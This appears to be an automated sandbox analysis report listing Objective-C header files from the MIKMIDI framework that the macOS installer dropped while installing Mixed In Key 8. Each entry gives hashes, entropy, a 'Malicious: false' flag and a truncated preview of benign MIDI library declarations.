File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1817
Entropy (8bit):	5.104546678450858
Encrypted:	false
SSDEEP:	24:Zs/blQl3/xA+yNaRT23b7+TINqRNZ4LGPI81joG4iLL7OW84j2Sf6g1Zj6UXXnoS:GlqZcqKLG91joG4o3OijF6g11oGL
MD5:	3CA9D646C12B1DE4E72CEE23357A09E2
SHA1:	ABB25074F618E881007743CC82D99F5027E441AE
SHA-256:	F5D0E63D77C784E724472A0DBA4847AE9BDF446A6DD5FA6F14A7503D6FE5D521
SHA-512:	532310AB40CB87C8C8A8CBD5A6E3CCC698D2D5655B872D1A89CE9CE6B030A227A9ADF48267B5472C853FE747672AA5922604F4905E459F96F07DC66657DA0946
Malicious:	false
Preview:	//.// MIKMIDIChannelEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/3/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN..@interface MIKMIDIChannelEvent : MIKMIDIEvent../*. Convenience method for creating a new MIKMIDIChannelEvent from a CoreMIDI MIDIChannelMessage struct.. . @param timeStamp A MusicTimeStamp value indicating the timestamp for the event.. * @param message A MIDIChannelMessage struct containing properties for the event.. . @return A new instance of a subclass of MIKMIDIChannelEvent, or nil if there is an error.. /.+ (nullable instancetype)channelEventWithTimeStamp:(MusicTimeStamp)timeStamp message:(MIDIChannelMessage)message;..// Properties../. The channel for the MIDI event.. /.@property (nonatomic, readonly) UInt8 channel;../. The first byte of data for the event.. /.@property (nonatomic, readonly) UInt8 dataByte1;../. The

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_5SYMJ3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	3910
Entropy (8bit):	4.876644679032012
Encrypted:	false
SSDEEP:	96:B9xgUs8tMOsCgtvOVgtCgbgLuQDqgQ61rgHeSQ8+8ozeFlLz:B9SUJMFO+vMLnFm+SQQ+IB
MD5:	3C893A6644013E1F86B49CAB09CD8731
SHA1:	527A1D8F8692C374BA5D1A814E6C2B0B424BBAAD
SHA-256:	6C44EEA770AAFDFA126C07DE7A6B86FCDB3E6EE7E99B5BCA79D74C40A71AC612
SHA-512:	0652942DA3E3EED58EA902095B428F171B3829321289D6459CA2C1DB064AA4D33D51EA893AA3DBCADC8FC70AF0AF792D9DAF210A7064E39A199FAAE96453C75B
Malicious:	false
Preview:	//.// MIKMIDIEvent_SubclassMethods.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/21/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN..@interface MIKMIDIEvent ()../*. Registers a subclass of MIKMIDIEvent. Registered subclasses will be instantiated and returned. * by +[MIKMIDIEvent ] for events they support.. . Typically this method should be called in the subclass's +load method.. . @note If two subclasses support the same event type, as determined by calling +supportsMIDIEvent:. * which one is used is undefined.. . @param subclass A subclass of MIKMIDIEvent.. /.+ (void)registerSubclass:(Class)subclass;../. Subclasses of MIKMIDIEvent must override this method, and return the MIKMIDIEventType. * values they support. MIKMIDIEvent uses this method to determine which. * subclass to use to represent a particular MIDI Event type.. . Note t

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_5x8gP9 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	12475
Entropy (8bit):	4.902941372946482
Encrypted:	false
SSDEEP:	192:Z5keCT4+7/jopx5SSToCD+t485WOmIcr2xInsxQdaSfJHyE+txO9Oh9wCb3TjUae:+o/5SSoCD+W8IOjcGFQdlL+tgIh2P
MD5:	C99E988A57F0C26376DB82DCD0C89469
SHA1:	72B51C41440BBB3DF8D412B0C9B97BE7ACC763F5
SHA-256:	00C363DC5C78D8D8C52C7524A653CD40598EAD9D3D2F93922669EDEEB6330C40
SHA-512:	B19FA3823E046E33CFD2EA65620B51183B348CF42A70F0A3E7B13C00631319D232A855C5C103CDCEA8DD3811D422F8ED812E2E6774D0BA1CDC5A612686D7B20A
Malicious:	false
Preview:	//.// MIKMIDITrack.h.// MIDI Files Testbed.//.// Created by Andrew Madsen on 5/21/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDISequence;.@class MIKMIDIEvent;.@class MIKMIDINoteEvent;.@class MIKMIDIDestinationEndpoint;..NS_ASSUME_NONNULL_BEGIN../*. Instances of MIKMIDITrack contain sequences of MIDI events. Commonly,. * these will be MIDI notes. Multiple MIKMIDITracks can be contained in a. * MIKMIDISequence, which can be played.. * . * @see MIKMIDISequence. /.@interface MIKMIDITrack : NSObject../. Inserts the specified MIDI event into the receiver.. . @param event The MIDI event to insert into the track.. /.- (void)addEvent:(MIKMIDIEvent )event;../*. Inserts the specified MIDI events into the receiver.. . @param events An NSArray containing the events to be added.. */.- (void)addEvents:(MIKArrayOf(MIKMIDIEve

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_6fiXSw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	3546
Entropy (8bit):	4.9195115639416676
Encrypted:	false
SSDEEP:	96:MMoT8UfHmSQwwrZheQwqnGlPzvGZjygnyNTHIMQxOeYqZG:uAiGlFrZhRfGBzvGoZrIMQgeq
MD5:	BAAA4C91E1BF91A2D3C8B1622210C76E
SHA1:	63866F1E6277B42866BF131768496EB07B438F63
SHA-256:	254C196E943065F867B5DCEA0601246CE52911A9ED96208C2147E883F6A706B2
SHA-512:	29E2F07852CF3968303234FF6B7A985BE954579B3953B61C500BB8C73BAE8BC4E29F5A81FBF380470280E17CE11E1819469D3B101261934F1FD04AD223A9FB31
Malicious:	false
Preview:	//.// MIKMIDIObject.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreMIDI/CoreMIDI.h>.#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIObject is the base class for all of MIKMIDI's Objective-C wrapper classes for CoreMIDI classes.. * It corresponds to MIDIObject in CoreMIDI.. . MIKMIDIObject is essentially an "abstract" base class, although it does implement several methods common. * to all MIDI objects.. /.@interface MIKMIDIObject : NSObject../. Convenience method for creating a new MIKMIDIObject instance. Returns an instance of a. * concrete subclass of MIKMIDIObject (e.g. MIKMIDIDevice, MIKMIDIEntity, . * MIKMIDISource/DestinationEndpoint) depending on the type of the object passed into it.. . @param objectRef A CoreMIDI MIDIObjectRef.. . @return An instance of the appropriate subclass of MIKMIDIObject.. */.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_6ng2gU Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	967
Entropy (8bit):	5.10730422383203
Encrypted:	false
SSDEEP:	12:ZhdUNXbw0vnPvohlvWYMhDZeL3y3YhgSAF7Y96YMhYxKT3Kshky0FQz8d6:ZhdMw03Ah1WRhDZUsAg7I6Rh5Z
MD5:	901C7C8120F89F1A20DE36C4E970F9FA
SHA1:	E90DA8AE9FF606A7EA5BE723A0AFE9CAAABBFDE3
SHA-256:	93C571DA4AC321EF0CDD6B1EE2F5049B01D6BEBB368671AD94D32E491A287DC4
SHA-512:	85ABA1B8299578E2F8FF7D9E1AFBFBE0CF8219AF312113EB948BDA0671CFCDB7DFD314A95D8A4628A8583BCD172590F888315B058541E3F510ADF814BCA1AB6F
Malicious:	false
Preview:	//.// MIKMIDIMetadataTextEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A meta event containing text.. /.@interface MIKMIDIMetaTextEvent : MIKMIDIMetaEvent..- (instancetype)initWithString:(NSString )string timeStamp:(MusicTimeStamp)timeStamp;../*. The text for the event.. /.@property (nonatomic, readonly, nullable) NSString string;..@end../*. The mutable counterpart of MIKMIDIMetaTextEvent.. /.@interface MIKMutableMIDIMetaTextEvent : MIKMIDIMetaTextEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData metaData;.@property (nonatomic, copy, readwrite, nullable) NSString *string;..@end..NS_ASSUME_NONNULL_END

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_7Qhm3f Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	701
Entropy (8bit):	5.2060758756514955
Encrypted:	false
SSDEEP:	12:Z7cjhtqboC72vnzjiE2VTREmnozFbhEoGaThVExeah6:ZYjhtYoC723QXEmkF6oGaxL
MD5:	50765118E1B564B7073C310E29B55B0A
SHA1:	5EEFBEBCA19D98CFC1A4591EEFA8C86A9A32436B
SHA-256:	0023B68849FE6AE4555873C032A1537D12E5A01927B27E32AEB83D1C664FF9AC
SHA-512:	63C0829EB6F9392CDA7B6F31BBC285C8BC1555FB803D1234CA6E1520BB1DBAF73D4599B0E88641A8FE6095E206E954D80EE58B548B5940711F5A37E011F52E0E
Malicious:	false
Preview:	//.// MIKMIDIPort.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIObject.h".#import <CoreMIDI/CoreMIDI.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIEndpoint;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIPort is an Objective-C wrapper for CoreMIDI's MIDIPort class. It is not intended for use by clients/users of. * of MIKMIDI. Rather, it should be thought of as an MIKMIDI private class.. /.@interface MIKMIDIPort : NSObject..- (nullable instancetype)initWithClient:(MIDIClientRef)clientRef name:(NSString )name;..@property (nonatomic, readonly) MIDIPortRef portRef;..@end..NS_ASSUME_NONNULL_END

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_8q00es Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	2698
Entropy (8bit):	4.871649472951399
Encrypted:	false
SSDEEP:	48:D5/YYVPU0JLoybnjs5A5sYDlinq4BwwIMo:1/HdrbQ5XYZiCwO
MD5:	2D70F2E51ABA5969EE960B60A6F4D0C1
SHA1:	02475998FBC97B5DE71CC9386ADB5B82F6E6522F
SHA-256:	AEDBECF612B85F87E553C16C1BE13C65BE7E2B87D94B2C0A5DE9C32D43814704
SHA-512:	A7648BE907DCD606254524A5339E439FCEDC589E5B945019FC4F9D9B840B45AB214B0F4895F291C2400EFF997378E0C68605F2047CFC5F19A403727AD17FFC19
Malicious:	false
Preview:	//.// MIKMIDI.h.// MIKMIDI.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//../** Umbrella header for MIKMIDI public interface. */..// Core MIDI object wrapper.#import "MIKMIDIObject.h"..// MIDI port.#import "MIKMIDIPort.h".#import "MIKMIDIInputPort.h".#import "MIKMIDIOutputPort.h"..// MIDI Device support.#import "MIKMIDIDevice.h".#import "MIKMIDIDeviceManager.h".#import "MIKMIDIConnectionManager.h"..#import "MIKMIDIEntity.h"..// Endpoints.#import "MIKMIDIEndpoint.h".#import "MIKMIDIDestinationEndpoint.h".#import "MIKMIDISourceEndpoint.h".#import "MIKMIDIClientDestinationEndpoint.h".#import "MIKMIDIClientSourceEndpoint.h"..// MIDI Commands/Messages.#import "MIKMIDICommand.h".#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDINoteCommand.h".#import "MIKMIDIChannelPressureCommand.h".#import "MIKMIDIControlChangeCommand.h".#import "MIKMIDIProgramChangeCommand.h".#import "MIKMIDIPitchBendChangeCommand.h".#import "MIKMIDINoteOnComm

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_957Thg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	2749
Entropy (8bit):	4.9771302647808175
Encrypted:	false
SSDEEP:	48:YhSZynqoaFySzl4RnGujWzaFySzXGujWv5y4uagiigTItgv:YhSu3IiR6zIr6v5i3gTImv
MD5:	58E720EB3B5634C67F205B440726B718
SHA1:	554D0D1BD9FEEC320CCDDE5B714CE49F3B75B8DD
SHA-256:	DB95EA3DFADAAF2CB5C5E1C4FB12E3F53FF9FC7F5535886FEB43689C8C443910
SHA-512:	DDF79B58ACB6455F20045F07B798473369580BD7BF435FB9237C53F2E9CC83CBC3AD3E2B312CD57CA03CFEA1EC0B0534049A439DA898B2A060542459C8879D31
Malicious:	false
Preview:	//.// MIKMIDINoteCommand.h.// MIKMIDI.//.// Created by Andrew R Madsen on 9/18/17..// Copyright . 2017 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A MIDI note on message.. /.@interface MIKMIDINoteCommand : MIKMIDIChannelVoiceCommand../. Convenience method for creating a note on command.. . @param note The note number for the command. Must be between 0 and 127.. * @param velocity The velocity for the command. Must be between 0 and 127.. * @param channel The channel for the command. Must be between 0 and 15.. * @param isNoteOn YES if the command should be a note on command, NO if it should be a note off command.. * @param timestamp The timestamp for the command. Pass nil to use the current date/time.. . @return An initialized MIKMIDINoteCommand instance.. */.+ (instancetype)noteCommandWithNote:(NSUInteger)note....... velocity:(NSUInteger)velocity.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Azgy5u Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	839
Entropy (8bit):	5.079193431455825
Encrypted:	false
SSDEEP:	24:Zaxh4YoiSm2MGvIG3CBgjshynt3j8IxvmFfopZ:Mb4YoHmDGvIGggjshynVjjxxpZ
MD5:	9146BDEAC6D8C8490568328E6C2FD6E1
SHA1:	5C203CB78FADDD4E9E570B31B20F17C9C121A5D6
SHA-256:	8434B9FD06093254B25F26870216A21EBCD892853A0CFC4E5248EF973AC49D62
SHA-512:	D318ED72E43169E28CAB0BB82425BB4D1512D226C51B3046572E25408D6691EA98C22D47DC2B10DA31A1F6C32BA94EBAF4DAFA5593D6276F837734CAAE6132E0
Malicious:	false
Preview:	//.// MIKMIDIEndpoint.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIObject.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIEntity;..NS_ASSUME_NONNULL_BEGIN../*. Base class for MIDI endpoint objects. Not used directly, rather, in use, instances will always be. * instances of MIKMIDISourceEndpoint or MIKMIDIDestinationEndpoint.. /.@interface MIKMIDIEndpoint : MIKMIDIObject../. The entity that contains the receiver. Will be nil for non-wrapped virtual endpoints.. /.@property (nonatomic, weak, readonly, nullable) MIKMIDIEntity entity;../*. Whether or not the endpoint is private or hidden. See kMIDIPropertyPrivate in MIDIServices.h.. */.@property (nonatomic, readonly) BOOL isPrivate;..@end..NS_ASSUME_NONNULL_END

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_FXtJLj Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1076
Entropy (8bit):	5.045084983122784
Encrypted:	false
SSDEEP:	24:Z/n440Ql3sTgnaxQG3Qn934ULGP7n8+ctgj7gJn76a/nv/:ZnF0BgnVdnnLGjn8ngHgJn76an3
MD5:	FCE4F61D0E51AFF2C6B5C6AEA3687FD3
SHA1:	C21529C41BA2321FE47A928EAC3B4A7B7CE82660
SHA-256:	526C62C77D3A6E68F5AA4E65FB4FABC16E2A4598260BE066A1D9696E1CE192CA
SHA-512:	9A2693089FF052DAD1B7E5101475759D1E2EE3DC2D7ADFE63B81E732FEBB910B6172CE796D7B283AAE777C7A2E2BD0AB9CCCC4A05B581455E66EE73147657A31
Malicious:	false
Preview:	//.// MIKMIDITempoEvent.h.// MIDI Files Testbed.//.// Created by Andrew Madsen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../** . * A MIDI tempo event.. /.@interface MIKMIDITempoEvent : MIKMIDIEvent../. Creates and initializes a new MIKMIDITempoEvent.. . @param timeStamp The time stamp for the tempo event.. . @param bpm The beats per minute of the tempo event.. . @return A new instance of MIKMIDITempoEvent. /.+ (instancetype)tempoEventWithTimeStamp:(MusicTimeStamp)timeStamp tempo:(Float64)bpm;../. The beats per minute of the tempo event.. /.@property (nonatomic, readonly) Float64 bpm;..@end../. The mutable counterpart of MIKMIDITempoEvent.. /.@interface MIKMutableMIDITempoEvent : MIKMIDITempoEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, strong, readwrite, null_resettable) NSMutableData data

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_G1UaYH Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1728
Entropy (8bit):	4.966864238788254
Encrypted:	false
SSDEEP:	24:ZVYbiPE+JEj2ZV1Ly2moMZBp421pRlEFWm2ZYvR1n1Guj4iLzB4mQnxn21VEG1:OiPEZ2ZTLfkX1Iu4RPGuj4oCx2MI
MD5:	6B81DBB2125DFA905D4037D5223D075C
SHA1:	45B5E71F4E55D5A8C9544843168C79FE69E8AB1C
SHA-256:	D3767F425F587448BBB0BD01AE829A9C3BAF4FF3C980BBA3352AF502EBFA327C
SHA-512:	D8CA134C2E3838E85B290C8049A9207B0C6DE62C13CAABD102C848B8EA924D77616F220E06FAAAA2953CBFF5A804C5E7EAD6D7FB68539B948DFC9E22C17D3B49
Malicious:	false
Preview:	//.// MIKMIDIChannelPressureCommand.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/12/15..// Copyright . 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDIChannelPressureCommand.h"..NS_ASSUME_NONNULL_BEGIN../*. A MIDI channel pressure message. This message is most often sent by pressing. * down on the key after it "bottoms out". This differs from a MIKMIDIPolyphonicKeyPressureCommand. * in that is the single greatest pressure of all currently depressed keys, hence the lack. * of a note property.. /.@interface MIKMIDIChannelPressureCommand : MIKMIDIChannelVoiceCommand../*. Convenience method for creating a channel pressure command... @param pressure The pressure for the command. Must be between 0 and 127. @param channel The channel for the command. Must be between 0 and 15.. @param timestamp The timestamp for the command. Pass nil to use the current date/time.. @return An initialized MIKMIDIChannelPressureCommand instance

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_G8iJoN Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	5281
Entropy (8bit):	4.768154939595193
Encrypted:	false
SSDEEP:	96:M1OmqZ+je49Mft+sLg4Ch++39EXg4Che+sLginLhu+39EXginLhO+hRLg4j3z+3M:MkmqZ+je49Gt+sLRCh++3GXRChe+sLDA
MD5:	3404519004DDAB96CB278DEEBBF8E4BF
SHA1:	A508BF4388F9DDC5BC67141E3CA2136197AEBCFB
SHA-256:	A68C069E64DA2074694D20536D29E0E0FCEB1560765F5FC850F1AF6C6503CBF4
SHA-512:	8BBBD93EA05D3DA75C163295829FF0CEB8D45B3AF638DB4C402EB828E0A6C823C0251FD0B597A3EA0EFF5C7970918359FE889956CE3D3410D64C0F0A0FF5A3EE
Malicious:	false
Preview:	//.// MIKMIDIEndpointSynthesizer.h.// MIKMIDI.//.// Created by Andrew Madsen on 5/27/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDISynthesizer.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIEndpoint;.@class MIKMIDISourceEndpoint;.@class MIKMIDIClientDestinationEndpoint;.@class MIKMIDISynthesizerInstrument;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIEndpointSynthesizer is a subclass of MIKMIDISynthesizer that. * provides a very simple way to synthesize MIDI commands coming from a. * MIDI endpoint (e.g. from a connected MIDI piano keyboard) to produce sound output.. . To use it, simply create a synthesizer instance with the source you'd like it to play. It will. * continue playing incoming MIDI until it is deallocated.. . @see MIKMIDISynthesizer. /.@interface MIKMIDIEndpointSynthesizer : MIKMIDISynthesizer../. Creates and initializes an MIKMIDIEndpointSynthesizer instance using Apple's DLS synth as the. * underlying instr

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_GMrzd3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1261
Entropy (8bit):	5.145011106872849
Encrypted:	false
SSDEEP:	12:Z7PNzbxRbFQRvnPvs1xvbWHmWJKkPNp1eQD1K7kQAPQirxLZPNp17PNDoXSsNrge:ZBbv+3EOGwKk18/e/ZL1iOk
MD5:	DD459817E8302C3128B5968982B29838
SHA1:	BA3ED980009C7088A68A8D1B2A0282DBF37DEB94
SHA-256:	9DB199883CD47755B41DEBF9DBC62705E36AE7A4F2775E2525354953B4FFBA48
SHA-512:	5EBC14B5D6DFE0AAEECE09603BC9AF1D8449062D7D9DDE017086EFB44A209BBFA11900613912B0D4FE2492A922046102010E0D6D05EEDC184D88050237927188
Malicious:	false
Preview:	//.// MIKMIDIPitchBendChangeCommand.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/5/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A MIDI pitch bend change command.. . On devices, pitch bends messages are usually generated using a wheel or lever.. /.@interface MIKMIDIPitchBendChangeCommand : MIKMIDIChannelVoiceCommand../. A 14-bit value indicating the pitch bend.. * Center is 0x2000 (8192).. * Valid range is from 0-16383.. /.@property (nonatomic, readonly) UInt16 pitchChange;..@end..@interface MIKMutableMIDIPitchBendChangeCommand : MIKMIDIPitchBendChangeCommand..@property (nonatomic, readwrite) UInt16 pitchChange;..@property (nonatomic, readwrite) UInt8 channel;.@property (nonatomic, readwrite) NSUInteger value;..@property (nonatomic, strong, readwrite) NSDate timestamp;.@property (nonatomic, readwrite) MIKMIDICommandType commandType;.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_I4humc Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	10637
Entropy (8bit):	4.803735584974795
Encrypted:	false
SSDEEP:	192:SOWcKNFDOEUqaymSmeOZGKa4rOAOR/HII8:SOWcK7uDSmeOcOHOR/oI8
MD5:	26FC1E0728F3BCAE3ED63EFC3AB2E97E
SHA1:	3CDB4C7219217F6DCABB9C1E05A017EF4EEA8304
SHA-256:	7F56D2625829C8F775C91DC7CE763623049F48891ED59F0F855C1F0CFBA6A099
SHA-512:	37AE66F94260BDE87C93BBDF8447641CFAF6CE7E7B0C2C1783B68C03D23B41AC5480AF2E4E6A358DF109B2420DF50E6C0D93C404DDFBB808C7C53FC77A3781CA
Malicious:	false
Preview:	//.// MIKMIDIMappingGenerator.h.// Danceability.//.// Created by Andrew Madsen on 7/19/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..#import "MIKMIDIMapping.h"..@class MIKMIDIDevice;.@class MIKMIDIMapping;.@class MIKMIDIMappingItem;.@class MIKMIDICommand;..@protocol MIKMIDIMappingGeneratorDelegate;..NS_ASSUME_NONNULL_BEGIN../*. Completion block for mapping generation method.. . @param mappingItem The mapping item generated, or nil if mapping failed.. * @param messages The messages used to generate the mapping. May not include all messages received during mapping.. * @param error If mapping failed, an NSError explaing the failure, nil if mapping succeeded.. /.typedef void(^MIKMIDIMappingGeneratorMappingCompletionBlock)(MIKMIDIMappingItem mappingItem, MIKArrayOf(MIKMIDICommand ) messages, NSError _Nullable error);../. MIKMIDIMappingGenerator is used to map incom

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_IaxYFg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	5653
Entropy (8bit):	4.842070663325969
Encrypted:	false
SSDEEP:	96:lpF2X/yh+akOUT/gCxsnB43FBsUPhGzX9IrvjkTeuesUPhGzX9IrvjkxeuSZ:/aJakLTDunBSFBJpGbCrvjkTeueJpGbI
MD5:	E786FD2DF137DED359D84B3C8CFAD2EB
SHA1:	836FE502B91D4CB87693F0FC0818826B7368643E
SHA-256:	3A46917E29842B03070896B9CE850547A8A390FD0B340889F907E05FD9D21D83
SHA-512:	C2AA94DD649BFEB8208CF6C9072F4CDD5CA901C688C54B4E636E5AFF4044FA692363920F6D15FD31C81665A645308238A25963A99DF27BC4F961855D02E0BD4D
Malicious:	false
Preview:	//.// MIKMIDIDevice.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIObject.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIEntity;.@class MIKMIDIEndpoint;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIDevice represents a MIDI device such as a DJ controller, MIDI piano keyboard, etc.. . Overview. * --------. . MIDI devices are for example, DJ controllers, MIDI piano keyboards, etc. For many applications,. * being able to discover, connect to, and receive messages from devices is fundamental to their use of MIDI.. * Instances of MIKMIDIDevice represent a MIDI device and MIKMIDIDevice includes methods for. * retrieving information about the device as well as obtaining its MIDI entities and endpoints in order. * to communicate with it.. . MIDI devices can contain multiple entities, and each entity can contain multiple source and destination. * endpoints. Commonly, however, a

